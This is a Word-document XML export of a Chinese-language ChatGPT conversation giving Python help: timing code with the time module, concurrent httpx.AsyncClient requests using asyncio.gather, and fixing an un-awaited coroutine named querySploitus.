        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310B2B90" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PyCharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内置模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来计算并打印你的程序运行时间。你可以在你的程序的开始和结束时分别获取当前的时间，然后用结束时间减去开始时间得到运行时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14930ECE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AB9FFE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是一个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B25C518" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1306D9D3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF3EA9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7773860C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25EA8474" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E826FD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="552C9160" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你的代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D1E512" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744DAB2B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>end_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AC8356" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3757AE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", end_time - start_time, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592B7518" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7337ED1C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码将会在程序运行结束时打印出程序的运行时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439051BE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="129CC88F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：以上方法提供的是运行时间的大概值，因为操作系统可能在执行你的程序的过程中进行了上下文切换，使得其它程序得以运行。如果你需要更准确的运行时间，可以考虑使用专门的性能分析工具，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cProfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6C3F5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5855B6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我如何使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对我刚才说的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx.AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重复使用，同时并发请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DCFA70" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068073EE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08EC31C1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的任务创建函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.create_task() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来并发执行多个协程。下面是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpx.AsyncClient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行并发请求的示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D66BE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169B789E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656F06F5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import httpx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6AE2BB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72891831" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1071FE2C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def fetch_data(client, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0030A6E5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    response = await client.get(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F488D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return response.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0F2D40" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6447EB48" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361A0CBD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient() as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20677180" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        urls = ["http://example.com", "http://anotherexample.com", "http://yetanotherexample.com"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B79EFE0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tasks = [fetch_data(client, url) for url in urls]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF43CF1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        responses = await asyncio.gather(*tasks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D2B7D9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for response in responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E3F8EB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            print(response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D1173A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4574ED54" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C18084" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676C08FD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，我们先创建了一个任务列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tasks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中每个任务都是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> fetch_data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程的实例，然后我们使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather(*tasks) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来并发运行这些任务。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.gather() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会等待所有的任务完成，然后返回一个列表，其中每个元素都是相应任务的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A1C53A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77180A73" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：在真实的使用场景中，你需要处理可能出现的网络错误，例如请求超时、连接错误等。你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> try/except </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> fetch_data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中捕获这些错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7055C972" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261E1B5E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sys:1: RuntimeWarning: coroutine 'querySploitus' was never awaited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0CAFD9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC31BB5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010ABC9C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个警告表明你创建了一个协程，但是没有使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字等待它的结果。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的协程必须使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来调用并等待结果。否则，协程将被创建但永远不会执行，这也就是你看到的那个警告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F25596" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52CA15B6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，你可能有类似这样的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAFD1A1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D09DBDD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4486FA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FAE88D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # some code here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B87138" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDC3EE4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>querySploitus()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F65B0F5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4271DC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述代码创建了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>querySploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程，但是没有等待它。你需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来调用并等待这个协程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F16CA01" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28507456" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318BD757" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD1051D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # some code here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BE0193" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694F4EA6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>await querySploitus()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228925E0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027EC79D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是，需要注意的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义的协程函数内部使用。所以，如果你想在程序的顶层运行协程，你需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.run()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC7F37" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E694F20" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D6FEC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638B566C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # some code here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F5515" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EFFD63" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(querySploitus())</w:t>
      </w:r>
    </w:p>
